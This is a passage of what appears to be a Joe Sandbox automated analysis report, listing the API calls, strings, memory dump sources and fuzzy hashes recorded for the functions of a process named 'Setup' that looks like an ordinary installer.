• std::exception::exception.LIBCMT ref: 698F9206
• std::exception::exception.LIBCMT ref: 698F9220
• __CxxThrowException@8.LIBCMT ref: 698F9231
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID:
• API String ID: 615853336-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _malloc.LIBCMT ref: 69DCC0C4
  • Part of subcall function 69DCBFB3: __FF_MSGBANNER.LIBCMT ref: 69DCBFCC
  • Part of subcall function 69DCBFB3: __NMSG_WRITE.LIBCMT ref: 69DCBFD3
  • Part of subcall function 69DCBFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,69DA831D,00000000,?,69DCC0C9,69DAF845,00000C00,00000020,69DAF845,?), ref: 69DCBFF8
• std::exception::exception.LIBCMT ref: 69DCC0F9
• std::exception::exception.LIBCMT ref: 69DCC113
• __CxxThrowException@8.LIBCMT ref: 69DCC124
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID:
• API String ID: 615853336-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32(00000000,009A2AE3), ref: 009A35E8
• __malloc_crt.LIBCMT ref: 009A3617
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009A3624
Memory Dump Source
• Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D76968
• #205.MSI(?,00000000,?,00000010,?,?,SkipProduct,?,?,VersionMaxInclusive,?,00000000,?,?,?,VersionMaxInclusive), ref: 69D769C3
Strings
• skipped after applying Relation criteria, xrefs: 69D76C29
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: #205H_prolog3
• String ID: skipped after applying Relation criteria
• API String ID: 2698596250-1982174377
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemInfo.KERNEL32(?), ref: 69D75562
                                                                                                                                                                      • Part of subcall function 69D74FAC: _memset.LIBCMT ref: 69D74FB4
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3InfoSystem_memset
                                                                                                                                                                    • String ID: %s - %s %s %s$Unknown OS
                                                                                                                                                                    • API String ID: 3853411852-1218788732
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8439E
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A5D0: __EH_prolog3.LIBCMT ref: 69D7A5D7
                                                                                                                                                                      • Part of subcall function 69D7A5D0: SysFreeString.OLEAUT32(?), ref: 69D7A62B
                                                                                                                                                                      • Part of subcall function 69DA8863: _wcschr.LIBCMT ref: 69DA887A
                                                                                                                                                                      • Part of subcall function 69D844EA: __EH_prolog3.LIBCMT ref: 69D844F1
                                                                                                                                                                      • Part of subcall function 69D844EA: __CxxThrowException@8.LIBCMT ref: 69D845E9
                                                                                                                                                                      • Part of subcall function 69D84613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8468D
                                                                                                                                                                      • Part of subcall function 69D84613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,69D842F8,69D6A794,02602230), ref: 69D8469E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Close$Exception@8FreeStringThrow_wcschr
                                                                                                                                                                    • String ID: RegKey$RegValueName
                                                                                                                                                                    • API String ID: 3842226755-3571311812
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8426C
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7A63E: __EH_prolog3.LIBCMT ref: 69D7A645
                                                                                                                                                                      • Part of subcall function 69D7A63E: SysFreeString.OLEAUT32(?), ref: 69D7A69B
                                                                                                                                                                      • Part of subcall function 69D84397: __EH_prolog3.LIBCMT ref: 69D8439E
                                                                                                                                                                    • GetUserDefaultUILanguage.KERNEL32(69D6A794,02602230), ref: 69D84302
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DefaultFreeLanguageStringUser
                                                                                                                                                                    • String ID: LCIDHint
                                                                                                                                                                    • API String ID: 188276182-1583853939
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetThreadLocale.KERNEL32(00000000), ref: 698EE1FD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocaleThread
                                                                                                                                                                    • String ID: UiInfo.xml
                                                                                                                                                                    • API String ID: 635194068-3938134364
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D96E4D
                                                                                                                                                                      • Part of subcall function 69D950B2: __EH_prolog3.LIBCMT ref: 69D950B9
                                                                                                                                                                      • Part of subcall function 69D950B2: GetLastError.KERNEL32(00000000,LoadLibrary,00000000,0000000C,69D96E7F,00000000,?), ref: 69D95110
                                                                                                                                                                      • Part of subcall function 69D950B2: __CxxThrowException@8.LIBCMT ref: 69D9512D
                                                                                                                                                                    • GetCommandLineW.KERNEL32(00000000,?), ref: 69D96E8F
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                      • Part of subcall function 69D9516F: FreeLibrary.KERNEL32(00000000,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D9517C
                                                                                                                                                                      • Part of subcall function 69D9516F: LoadLibraryW.KERNEL32(?,?,?,69D950F8,00000000,0000000C,69D96E7F,00000000,?), ref: 69D95194
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69DBABA1: __EH_prolog3.LIBCMT ref: 69DBABA8
                                                                                                                                                                      • Part of subcall function 69DBABA1: GetProcAddress.KERNEL32(00000004,CreateClassFactory), ref: 69DBABB8
                                                                                                                                                                      • Part of subcall function 69DBABA1: GetLastError.KERNEL32 ref: 69DBABC6
                                                                                                                                                                      • Part of subcall function 69DBABA1: __CxxThrowException@8.LIBCMT ref: 69DBAC7D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ErrorException@8LastLibraryThrow$AddressCommandFreeLineLoadProc_malloc
                                                                                                                                                                    • String ID: passive
                                                                                                                                                                    • API String ID: 304155978-1995439567
                                                                                                                                                                    • Opcode ID: 9148eaec1cfe9b6f1dad7f3ba3adaf4336e15b864d162cfda1f3becfa53937dc
                                                                                                                                                                    • Instruction ID: ca2c72c21c94d3fe0920182072a08ee5e3e11c094f6f1ecc9c60f0e7d4e236d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 9148eaec1cfe9b6f1dad7f3ba3adaf4336e15b864d162cfda1f3becfa53937dc
                                                                                                                                                                    • Instruction Fuzzy Hash: 0C31ED75811349DBDF10EFB0C800B9DBBA5BF15318F00D979D865ABA80CB709A088BF1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA926F
  • Part of subcall function 69DB02A3: __EH_prolog3.LIBCMT ref: 69DB02AA
  • Part of subcall function 69DB02A3: GetCommandLineW.KERNEL32(0000001C,69DA9382,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C,02602254,?,?,?,?,?,?,UserExperienceDataCollection), ref: 69DB02AF
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$CommandLine
• String ID: Policy$UserExperienceDataCollection
• API String ID: 1384747822-3168315836
• Opcode ID: 711e55902e948c590f414d0f0fc576be5ce8125ef9d2b595383c5b5604ee9651
• Instruction ID: 783e483e5bd91bdd43942c4e34030c2d4effdd1e059aac83088e696fb7bc85f3
• Opcode Fuzzy Hash: 711e55902e948c590f414d0f0fc576be5ce8125ef9d2b595383c5b5604ee9651
• Instruction Fuzzy Hash: E3313CB4A04245EFDB04DFA8C944AAE7BB9BF49354F148168F815DF781CB35DA04CBA1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D81EC6
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D819AD: __EH_prolog3.LIBCMT ref: 69D819B4
  • Part of subcall function 69D819AD: __CxxThrowException@8.LIBCMT ref: 69D81ADE
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$Exception@8Throw
• String ID: BlockIf$DisplayText
• API String ID: 2489616738-2498774408
• Opcode ID: b1173c532b431cf40730fda7bd25ca97e00753691a6f0d9ac29b878ad5d277b9
• Instruction ID: 600fdc81f86e0fb9b131377238b71e071443e64c2d7864d690e76786f59930ec
• Opcode Fuzzy Hash: b1173c532b431cf40730fda7bd25ca97e00753691a6f0d9ac29b878ad5d277b9
• Instruction Fuzzy Hash: 9A312FB5910249EFCF00DFA8C940A9E77B9BF45358F148168F825AB751C734EA19CBB1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D857EC
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
• _memcpy_s.LIBCMT ref: 69D85887
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3$_memcpy_s
• String ID: #(loc.
• API String ID: 1663610674-1630946291
• Opcode ID: 557f0b1460d2bee47c48489ec0ea38f5c41b459372061cc79c25be50213a790d
• Instruction ID: c01bf70de439c5e7848ed143b9b14f787544c07e05e28d592adceaf945cd488c
• Opcode Fuzzy Hash: 557f0b1460d2bee47c48489ec0ea38f5c41b459372061cc79c25be50213a790d
• Instruction Fuzzy Hash: B731A076900114EFCF00DFA8C884A9D7BA5BF00328F44C675E925AFA91CB30EE15CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: RepairOverride$UninstallOverride
• API String ID: 431132790-715699446
• Opcode ID: 71f924119946d9cc54bc6f00d92a360a0f431991214934fc78eb4aea12e73628
• Instruction ID: 0918e25ced121d13c8dfae8a466090d766a72fc451e0ad89723270a40d4a781b
• Opcode Fuzzy Hash: 71f924119946d9cc54bc6f00d92a360a0f431991214934fc78eb4aea12e73628
• Instruction Fuzzy Hash: F0316CB4500748EFCB10CFA8C941B9EBBB9BF15314F10897DE5699BB91C770A604CB61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 698F7AFC
  • Part of subcall function 698F7F08: GetLastError.KERNEL32(698F7B0B,?,?,?,00000000), ref: 698F7F08
• GetTempFileNameW.KERNEL32(?,TFR,00000000,?,?,?,?,00000000), ref: 698F7B54
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: Temp$ErrorFileLastNamePath
• String ID: TFR
• API String ID: 3373471080-3081930533
• Opcode ID: e7bbc96b5a1227d5f9d24abb213f3175d80f64abe0bf6e6c1fa4a4bf96805e9f
• Instruction ID: c6080bcb1d3aeef169a4a847396d36db36fe37d5067beb061f87ac786a1548a9
• Opcode Fuzzy Hash: e7bbc96b5a1227d5f9d24abb213f3175d80f64abe0bf6e6c1fa4a4bf96805e9f
• Instruction Fuzzy Hash: 15210AB1A002186AFB10DB58CC45FDE73BCAF05754F505AADF214E31C0D7749A868BA5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DAEA7B
• GetComputerObjectNameW.SECUR32(00000007,00000000,69DAFA6E), ref: 69DAEAC0
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: ComputerH_prolog3NameObject
• String ID: microsoft.com
• API String ID: 4212761916-499418652
• Opcode ID: 8e02fb83d33ab9d3567f9c0a43d4bcc969b446bb211fd9493b6d8c411c7e1b6d
• Instruction ID: 159d831fca44b49bf8d751e2eb5753070362a266049309208676ce4c6111db87
• Opcode Fuzzy Hash: 8e02fb83d33ab9d3567f9c0a43d4bcc969b446bb211fd9493b6d8c411c7e1b6d
• Instruction Fuzzy Hash: B2219D35A00255CBCB04DFB8C844ABDBB72BF41328F509679D532A7AD0DB719A19C772
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69DA7DB7
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
  • Part of subcall function 69D74CB2: __EH_prolog3.LIBCMT ref: 69D74CB9
  • Part of subcall function 69D7395E: __EH_prolog3.LIBCMT ref: 69D73965
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: Operation Type$Operation: %s
• API String ID: 431132790-3288381836
• Opcode ID: 516dea513373046e71bdda30e4bfa87c0f6057ebae5fecf4ef6c176a7d9c0d1a
• Instruction ID: 4e25bab52a6fe29d164f560fe1ec648d096eb7a1e34252d3ba84afbcabe189d6
• Opcode Fuzzy Hash: 516dea513373046e71bdda30e4bfa87c0f6057ebae5fecf4ef6c176a7d9c0d1a
• Instruction Fuzzy Hash: 7C215875900249EFCB00DBE8C945EAEBBF9BF14308F148069E144EB791C7349A05CBB2
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D836FF
  • Part of subcall function 69D838A1: __EH_prolog3.LIBCMT ref: 69D838A8
  • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: H_prolog3
• String ID: CustomError$ReturnCode
• API String ID: 431132790-4065127629
• Opcode ID: 2d49379f5eb4a5c5b4dc77f13f3848461368617a860507946f94b4de21cf97c1
• Instruction ID: 77e69e1bce5471d3187e0ce8f64f09b1035b6e9067cf8cec026c0dbf6b882ac7
• Opcode Fuzzy Hash: 2d49379f5eb4a5c5b4dc77f13f3848461368617a860507946f94b4de21cf97c1
• Instruction Fuzzy Hash: FC213375A0020A9FCF00DFA8C950A6DB7B9BF45318F148569E415DB781CB75E905CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 698DF0CF
  • Part of subcall function 698EF21D: _wcsnlen.LIBCMT ref: 698EF1B2
• DeleteFileW.KERNEL32(00000000,00000010,HFI,00000000,00000000,698D79E4,00000004,698F57E2,?,?,?,?,?,?,00000024,698DF18B), ref: 698DF14B
Strings
Memory Dump Source
• Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
• Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
Similarity
• API ID: DeleteFileH_prolog3_wcsnlen
• String ID: HFI
• API String ID: 1332513528-686494941
• Opcode ID: 3c05fbfc40dd118ec282818e3b5f99311d7c016b8ee802dc7323a1fa18775f5c
• Instruction ID: a5f559cc97ce56193d011ef7b36204fe13275f55f751d9c4e5552e81557b6690
• Opcode Fuzzy Hash: 3c05fbfc40dd118ec282818e3b5f99311d7c016b8ee802dc7323a1fa18775f5c
• Instruction Fuzzy Hash: 4311AC393001489FCB05DF7CC94469EB7A4AF3535CF00AA5DE462EB290DB70990AAB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsnlen.LIBCMT ref: 69DAFF54
• _memcpy_s.LIBCMT ref: 69DAFF8A
  • Part of subcall function 69DC8E8C: __CxxThrowException@8.LIBCMT ref: 69DC8EA0
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: Exception@8Throw_memcpy_s_wcsnlen
• String ID: OS Version Information
• API String ID: 31407445-551053750
• Opcode ID: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
• Instruction ID: e22f1f63b918449d925a08670c66a484aa9f45ab939e81167ca5c2944ba51c19
• Opcode Fuzzy Hash: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
• Instruction Fuzzy Hash: 3D01C436600108EF8B04CF6CCC44D9E77A9EB85364711C17DF4289B650EA34EA15CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 69D95325
  • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
• DeleteFileW.KERNEL32(?,00000010,HFI,00000000,?,69D6AB18,00000004,69DBA448,F0D05EFD,F0D05EFD,?,?,69DA4B23), ref: 69D95399
Strings
Memory Dump Source
• Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
• Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
Similarity
• API ID: DeleteFileH_prolog3_wcsnlen
• String ID: HFI
• API String ID: 1332513528-686494941
• Opcode ID: 2c77014de1b57832257d52fb04515d248f90de629ea8cdd0ed2297700c88e95c
• Instruction ID: d3ff3fe23d7e6da9c6dc92dc78e67680a39990d92612597676e4e292fc3693e9
• Opcode Fuzzy Hash: 2c77014de1b57832257d52fb04515d248f90de629ea8cdd0ed2297700c88e95c
